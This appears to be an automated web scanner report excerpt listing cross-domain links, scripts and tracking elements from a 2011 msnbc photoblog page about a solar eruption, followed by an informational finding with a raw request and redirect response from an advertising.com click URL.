<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/photoblog/style.css?v=23247" />
<script class="cpk_chrome" language="javascript" type="text/javascript" src="http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247"></script>
...[SNIP]...
<div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=c5942494&amp;rand=1769568873&amp;do=msnbc.redacted&amp;rf=http%3A%2F%2Fwww.redacted%2F%3Focid%3Dhmlogout&amp;ad=9:9:80;44::;27:27:108;9:9:80;86:86:270;87:87:209;9:9:80;86:86:270;87:87:209;9:9:80;86:86:270;87:87:209;9:9:80;86:86:270;87:87:209;9:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>
...[SNIP]...
<li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a>
...[SNIP]...
<li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
...[SNIP]...
<li class="i7"><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li class="i9"><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a>
...[SNIP]...
<li class="i18"><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB" target="_blank">Feedback</a>
...[SNIP]...
<li class="i19"><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li class="i20"><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li id="bing" class="i3 bing"><a href="http://www.bing.com"><span>
...[SNIP]...
<li class="i2 show-today"><a href="http://today.msnbc.com/">TODAY</a></li>
           <li class="i3 show-nightly"><a href="http://nightly.msnbc.com/">Nightly News</a>
...[SNIP]...
<li class="i4 show-mtp"><a href="http://mtp.msnbc.com/">Meet the Press</a>
...[SNIP]...
<li class="i5 show-dateline"><a href="http://dateline.msnbc.com/">Dateline</a>
...[SNIP]...
<li class="i6 show-maddow"><a href="http://rachel.msnbc.com/">Maddow</a>
...[SNIP]...
<li class="i8 show-hardball"><a href="http://hardball.msnbc.com/">Hardball</a>
...[SNIP]...
<li class="i9 show-msnbc"><a href="http://tv.msnbc.com/">msnbc tv</a>
...[SNIP]...
<li class="i10 site-newsvine"><a href="http://www.newsvine.com/">Newsvine</a>
...[SNIP]...
<li class="i11 site-everyblock"><a href="http://www.everyblock.com/">EveryBlock</a>
...[SNIP]...
<li class="email_subscribe_option"><a href="https://www.newsvine.com/_nv/accounts/msnbc/emailAlerts?affiliate=msnbc.redacted"><img src="http://lib.newsvine.com/chrome/abstractmartinblog/images/icons-email.png" width="19" height="18" alt="Icons Email"> Receive e-mail updates</a>
...[SNIP]...
</div><a href="https://www.newsvine.com/_nv/accounts/msnbc/emailAlerts?affiliate=msnbc.redacted">change this</a>
...[SNIP]...
<div class="spinner hide"><img src="http://www.polls.newsvine.com/_vine/images/__/spinner.gif" width="16" height="16" alt="Loading" /> Saving...</div>
...[SNIP]...
<a href="http://photoblog.msnbc.redacted/_feeds/rss2/author"><img src="http://lib.newsvine.com/chrome/abstractmartinblog/images/icons-feed.png" width="18" height="18" alt="Icons Feed"> Subscribe to RSS</a>
...[SNIP]...
<!-- SiteCatalyst code version: G.9. Copyright 1997-2004 Omniture, Inc. More info available at http://www.omniture.com -->
<script src="http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247"></script>
...[SNIP]...
</script><script src="http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247"></script>
...[SNIP]...
</span>A spectacular double eruption on the sun was captured today by NASA's <a target="_blank" href="http://sdo.gsfc.nasa.gov/">Solar Dynamics Observatory</a>. The eruptions happened nearly simultaneously on opposite sides of the solar disk, <a target="_blank" href="http://spaceweather.com/">SpaceWeather.com reported</a>
...[SNIP]...
<p><a target="_blank" href="http://www.byjohnroach.com/"><i>
...[SNIP]...
</i><a target="_blank" href="http://www.facebook.com/cosmiclog"><i>
...[SNIP]...
</i><a href="http://twitter.com/b0yle"><i>
...[SNIP]...
<div class="tweetbutton"><a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc_pictures" data-related="breakingnews:The fastest breaking news on Twitter." data-url="http://photoblog.msnbc.redacted/_news/2011/01/28/5942494-double-whammy-on-the-sun" data-Text="Double whammy on the sun">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=standard&amp;show_faces=true&amp;width=480&amp;action=recommend&amp;colorscheme=light&amp;href=http://photoblog.msnbc.redacted/_news/2011/01/28/5942494-double-whammy-on-the-sun" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:480px; height:70px"></iframe>
...[SNIP]...
<a href="#star2" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://MikeyMike.newsvine.com/">MikeyMike</a>
...[SNIP]...
<a href="#star3" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://DS-Houston.newsvine.com/">DS in Houston</a>
...[SNIP]...
<a href="#star4" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://ilovecanoes.newsvine.com/">Chris-1664618</a>
...[SNIP]...
<a href="#star5" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://Ghost2516914.newsvine.com/">Ghost-2516914</a>
...[SNIP]...
<div class="normal"><a href="http://ilovecanoes.newsvine.com/">Chris-1664618</a>
...[SNIP]...
<a href="#star6" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://revlucifer.newsvine.com/">RevLucifer</a>
...[SNIP]...
<div class="normal"><a href="http://ilovecanoes.newsvine.com/">Chris-1664618</a>
...[SNIP]...
<a href="#star7" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://Eric2189088.newsvine.com/">Eric-2189088</a>
...[SNIP]...
<div class="normal"><a href="http://revlucifer.newsvine.com/">RevLucifer</a>
...[SNIP]...
<a href="#star8" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://ilovecanoes.newsvine.com/">Chris-1664618</a>
...[SNIP]...
<div class="normal"><a href="http://ilovecanoes.newsvine.com/">Chris-1664618</a>
...[SNIP]...
<div class="normal"><a href="http://OscarPWalnuts.newsvine.com/">Oscar P Walnuts</a>
...[SNIP]...
<div class="normal"><a href="http://ilovecanoes.newsvine.com/">Chris-1664618</a>
...[SNIP]...
<div class="normal"><a href="http://whyajones.newsvine.com/">Cappy-1911</a>
...[SNIP]...
<div class="normal"><a href="http://jayphly1300264.newsvine.com/">jayphly-1300264</a>
...[SNIP]...
<div class="normal"><a href="http://patrick111.newsvine.com/">Patrick-1112710</a>
...[SNIP]...
<div class="normal"><a href="http://aanhonestsortnhonestsort-1436725.newsvine.com/">anhonestsort-1436725</a>
...[SNIP]...
<div class="normal"><a href="http://PhantomBeast.newsvine.com/">PhantomBeast</a>
...[SNIP]...
<div class="normal"><a href="http://mklavano.newsvine.com/">mklavano</a>
...[SNIP]...
<div class="normal"><a href="http://ilovecanoes.newsvine.com/">Chris-1664618</a>
...[SNIP]...
<div class="normal"><a href="http://Roy-1813861.newsvine.com/">Roy-1813861</a>
...[SNIP]...
<div class="normal"><a href="http://martyofredbay.newsvine.com/">martyofredbay</a>
...[SNIP]...
<a href="#star9" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://Nerakluvs.newsvine.com/">Nerakluvs</a>
...[SNIP]...
<div class="normal"><a href="http://phloeman.newsvine.com/">phloeman</a>
...[SNIP]...
<div class="normal"><a href="http://Cabernet2go.newsvine.com/">Ken Johnson-306874</a>
...[SNIP]...
<a href="#star10" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://Sonflower.newsvine.com/">Sonflower</a>
...[SNIP]...
<div class="normal"><a href="http://wvbuild.newsvine.com/">wvbuild</a>
...[SNIP]...
<div class="normal"><a href="http://mdb123.newsvine.com/">MDB123</a>
...[SNIP]...
<div class="normal"><a href="http://Pandori.newsvine.com/">Pandori</a>
...[SNIP]...
<div class="normal"><a href="http://Attameus.newsvine.com/">Attameus</a>
...[SNIP]...
<div class="normal"><a href="http://IWonder2997692.newsvine.com/">I Wonder-2997692</a>
...[SNIP]...
<div class="normal"><a href="http://takestwo.newsvine.com/">takes two</a>
...[SNIP]...
<div class="normal"><a href="http://spiddas.newsvine.com/">Spiddas</a>
...[SNIP]...
<div class="normal"><a href="http://TheKhanKubla.newsvine.com/">TheKhanKubla</a>
...[SNIP]...
<div class="normal"><a href="http://countrygirl78.newsvine.com/">countrygirl78</a>
...[SNIP]...
<div class="normal"><a href="http://TheKhanKubla.newsvine.com/">TheKhanKubla</a>
...[SNIP]...
<a href="#star11" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://tracer58.newsvine.com/">tracer58</a>
...[SNIP]...
<div class="normal"><a href="http://Tony2997870.newsvine.com/">Tony-2997870</a>
...[SNIP]...
<div class="normal"><a href="http://Tony2997870.newsvine.com/">Tony-2997870</a>
...[SNIP]...
<div class="normal"><a href="http://DumbJock.newsvine.com/">Dumb Jock</a>
...[SNIP]...
<div class="normal"><a href="http://hal90004.newsvine.com/">~HAL9000~</a>
...[SNIP]...
<div class="normal"><a href="http://TAMUK.newsvine.com/">TAMUK</a>
...[SNIP]...
<div class="normal"><a href="http://larbell.newsvine.com/">larbell</a>
...[SNIP]...
<div class="normal"><a href="http://paulhardy.newsvine.com/">orbust</a>
...[SNIP]...
<div class="normal"><a href="http://2srvHM.newsvine.com/">2srvHM</a>
...[SNIP]...
<div class="normal"><a href="http://fdpfg.newsvine.com/">fdpfg</a>
...[SNIP]...
<div class="normal"><a href="http://wire-bender.newsvine.com/">1NewDay</a>
...[SNIP]...
<div class="normal"><a href="http://wire-bender.newsvine.com/">1NewDay</a>
...[SNIP]...
<div class="normal"><a href="http://phloeman.newsvine.com/">phloeman</a>
...[SNIP]...
<div class="normal"><a href="http://mossdog420m.newsvine.com/">Megalodon-358694</a>
...[SNIP]...
<p><a href="http://attameus.newsvine.com/">Attameus</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
<div class="normal"><a href="http://twyla-moon.newsvine.com/">Twyla Moon</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://UnregisteredUser.newsvine.com/">Unregistered User</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://polanofp.newsvine.com/">An American!</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://phillyc1.newsvine.com/">PhillyC</a>
...[SNIP]...
<div class="normal"><a href="http://elven-bookworm.newsvine.com/">Elven Bookworm</a>
...[SNIP]...
<div class="normal"><a href="http://a--smith-1451820.newsvine.com/">A. Smith-1451820</a>
...[SNIP]...
<a href="#star12" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://MC2075922.newsvine.com/">MC-2075922</a>
...[SNIP]...
<a href="#star13" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://ilovecanoes.newsvine.com/">Chris-1664618</a>
...[SNIP]...
<div class="normal"><a href="http://Phoehammer.newsvine.com/">Phoehammer</a>
...[SNIP]...
<div class="normal"><a href="http://BillyBill.newsvine.com/">BillyBill</a>
...[SNIP]...
<div class="normal"><a href="http://scott-mckinsey.newsvine.com/">Mbones</a>
...[SNIP]...
<div class="normal"><a href="http://edwardduffy.newsvine.com/">Edward Duffy</a>
...[SNIP]...
<div class="normal"><a href="http://DaveO2998087.newsvine.com/">Dave-O-2998087</a>
...[SNIP]...
<div class="normal"><a href="http://danwill2.newsvine.com/">danwill</a>
...[SNIP]...
<div class="normal"><a href="http://Weralldoomed.newsvine.com/">Weralldoomed</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
<div class="normal"><a href="http://robw1001.newsvine.com/">Robert Fleming</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://jpfs52.newsvine.com/">jpfs52</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://ilovecanoes.newsvine.com/">Chris-1664618</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://twyla-moon.newsvine.com/">Twyla Moon</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://senigallia.newsvine.com/">senigallia</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://uradouch.newsvine.com/">uradouch</a>
...[SNIP]...
<div class="normal"><a href="http://garrettb1.newsvine.com/">GarrettB</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://jwp6868.newsvine.com/">Joe in NC</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://a--smith-1451820.newsvine.com/">A. Smith-1451820</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://halowain.newsvine.com/">Hal Sherman</a>
...[SNIP]...
<div class="normal"><a href="http://countrygirl78.newsvine.com/">countrygirl78</a>
...[SNIP]...
<div class="normal"><a href="http://mar2892158.newsvine.com/">mar-2892158</a>
...[SNIP]...
<div class="normal"><a href="http://uradouch.newsvine.com/">uradouch</a>
...[SNIP]...
<div class="normal"><a href="http://uradouch.newsvine.com/">uradouch</a>
...[SNIP]...
<div class="normal"><a href="http://davidf3.newsvine.com/">DavidF</a>
...[SNIP]...
<div class="normal"><a href="http://takestwo.newsvine.com/">takes two</a>
...[SNIP]...
<div class="normal"><a href="http://jbunn.newsvine.com/">jbunn</a>
...[SNIP]...
<div class="normal"><a href="http://danwill2.newsvine.com/">danwill</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
<div class="normal"><a href="http://mnstrm2.newsvine.com/">Art-981203</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://ffeineandsugar.newsvine.com/">ffeineandsugar</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://sbphrog.newsvine.com/">SBPhrog</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://chibnikh.newsvine.com/">Herman C</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://steveorevo.newsvine.com/">S-480203</a>
...[SNIP]...
<div class="normal"><a href="http://Isthishumanity.newsvine.com/">Is this humanity</a>
...[SNIP]...
<div class="normal"><a href="http://snrekkcaj.newsvine.com/">Dissociate</a>
...[SNIP]...
<div class="normal"><a href="http://countrygirl78.newsvine.com/">countrygirl78</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://rwh0829.newsvine.com/">riscifiguy</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://MikeObama2313287.newsvine.com/">Mike Obama-2313287</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://votelover.newsvine.com/">votelover</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://raysmith.newsvine.com/">ray smith</a>
...[SNIP]...
<div class="normal"><a href="http://Fritz2712801.newsvine.com/">Fritz-2712801</a>
...[SNIP]...
<div class="normal"><a href="http://countrygirl78.newsvine.com/">countrygirl78</a>
...[SNIP]...
<div class="normal"><a href="http://mar2892158.newsvine.com/">mar-2892158</a>
...[SNIP]...
<div class="normal"><a href="http://uradouch.newsvine.com/">uradouch</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://raysmith.newsvine.com/">ray smith</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://raysmith.newsvine.com/">ray smith</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://Brilli99.newsvine.com/">Brilli-99</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://mklavano.newsvine.com/">mklavano</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://glenbo02.newsvine.com/">glenbo</a>
...[SNIP]...
<div class="normal"><a href="http://josh1791701.newsvine.com/">Josh-1791701</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
<div class="normal"><a href="http://RevitRay.newsvine.com/">Revit Ray</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://martyofredbay.newsvine.com/">martyofredbay</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://mpp2029706.newsvine.com/">mpp-2029706</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://Fritz2712801.newsvine.com/">Fritz-2712801</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://catastrophe3.newsvine.com/">cat(astrophe)</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<a href="#star14" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://markscastle.newsvine.com/">MC-784701</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://DaughterofDaedalus.newsvine.com/">Daughter of Daedalus</a>
...[SNIP]...
<div class="normal"><a href="http://davidf3.newsvine.com/">DavidF</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="privacytext"><a href="http://www.newsvine.com/_nv/cms/info/privacyPolicy" target="_blank">Newsvine Privacy Statement</a></div><img class="postCommentImage" src="http://www.polls.newsvine.com/_vine/images/_/b_postcomment.gif" /><img class="postingCommentImage" src="http://www.polls.newsvine.com/_vine/images/_/b_posting.gif" /></div>
...[SNIP]...
<div class="newuser">As a new user, you may notice a few temporary content restrictions. <a href="http://www.newsvine.com/_nv/cms/help/newUsers" target="_blank">Click here for more info</a>
...[SNIP]...
<span><img src="http://www.polls.newsvine.com/_vine/images/_/icon_track_mini.gif" width="12" height="12" alt="Start Tracking" title="Add this article to your conversation tracker without commenting on it" />Start Tracking</span>
...[SNIP]...
<span><img src="http://www.polls.newsvine.com/_vine/images/_/icon_stop_mini.gif" width="10" height="10" alt="Stop Tracking" />Stop Tracking</span>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
<div class="avatar"><a href="http://john-roach.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/jtroach-2120073942.jpg" width="60" height="60" /></a>
...[SNIP]...
<li><a href="http://redtape.msnbc.com/">Red Tape Chronicles</a>
...[SNIP]...
<a href="http://www.msnbc.redacted/"><img src="http://lib.newsvine.com/chrome/abstractmartinblog/images/msnbc-logo.png" alt="msnbc.com" width="166" height="20"></a>
...[SNIP]...
<li>
                   <a href="http://privacy.microsoft.com/en-us/default.aspx?SU=http://msnbc.redacted/">MSN Privacy</a>
...[SNIP]...
<li>
                   <a href="http://help.live.com/help.aspx?project=tou&amp;mkt=en-us">Legal</a>
...[SNIP]...
</div><link rel="stylesheet" type="text/css" href="http://lib.newsvine.com/Pierre/widgets/wetbar/wetbar.css">
<script type="text/javascript" language="JavaScript">
...[SNIP]...

22.251. http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461^950192^1183^0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461^950192^1183^0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461^950192^1183^0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64?trg= HTTP/1.1
Host: r1-ads.ace.advertising.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: F1=BcwvE1kAAAAAdVyCAEAAgEABAAAABAAAAUAAGAA; aceRTB=rm=Thu, 03 Feb 2011 00:12:50 GMT|am=Thu, 03 Feb 2011 00:12:50 GMT|dc=Thu, 03 Feb 2011 00:12:50 GMT|an=Sun, 20 Feb 2011 18:19:40 GMT|; BASE=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!; ACID=Bc330012940999670074; GUID=MTI5NjMwODMzMjsxOjE2aWYxN2Ewa3EwYmdkOjM2NQ; 12110217=_4d44bf07,6566708061,730461^950192^1183^0,0_; A07L=3dzaKJUOYWQidaSHS5y0YmSmFaXEvvd0LZvbK5g_-GSwVryO8dt0x1w; C2=H8LRNJpwIg02FzECdbdxMhwUwXMTI8Y4FzECYTexMhQ3gZMTIQTnGzECF2pxMhAohXMTIYZ4FzECKGexMhwohXMTIca4FzECiGexMhQshXMTwOYAM/ohjI7YCwAoGs0r1RQcKaQMGK2AI9YhqN53EkL3FHzgPXw6TVcVsumB/0mRjca7HIaWGBQrMew41ZYDkq1B6bjRNq6bDwWZGs6r4jQsMaEKwaHCW8oRo0I9IsfzFnysNiQQoaMT; ROLL=v5Q2H0MbU/zqUNH1h7d3T1ystuIiEaPHy4fCVadX/ASOjE6f+wnqYseyuA0vwlvFYFjqzjc8zqkwR3t+XXAr8QlWG4SSF/7N1Eja1YV2UmztMwbFznDUKtzd8HNCCLwX3RIWa/0nS8WT042H7E5JNtYzd2SZZdA!;

Response

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Location: http://c
Cache-Control: private, max-age=0, no-cache
Expires: Sun, 30 Jan 2011 02:18:07 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 125
Date: Sun, 30 Jan 2011 02:18:07 GMT
Connection: close
Set-Cookie: C2=fpMRNJpwIg02FqECdbdhKhwUwXoSI8Y4FqECYTehKhQ3gZoSIQTnGqECF2phKhAohXoSIYZ4FqECKGehKhwohXoSIca4FqECiGehKhQshXoSwOYAM/oRhI7YCwAoGj0r1RQcKasLGK2AI9YRoN53EkL3F+ygPXw6TV4UsumB/0mBhca7GIaWG4frMew41Z0Ckq1B6bjBLq6bDwWZGj6r4jQsMagJwaHCW8oBm0I9IsfzFeysNiQQoaoSCKCC9mUBwB; domain=advertising.com; expires=Tue, 29-Jan-2013 02:18:07 GMT; path=/
Set-Cookie: F1=B8lyE1kAAAAAdVyCAEAAOEA; domain=advertising.com; expires=Tue, 29-Jan-2013 02:18:07 GMT; path=/
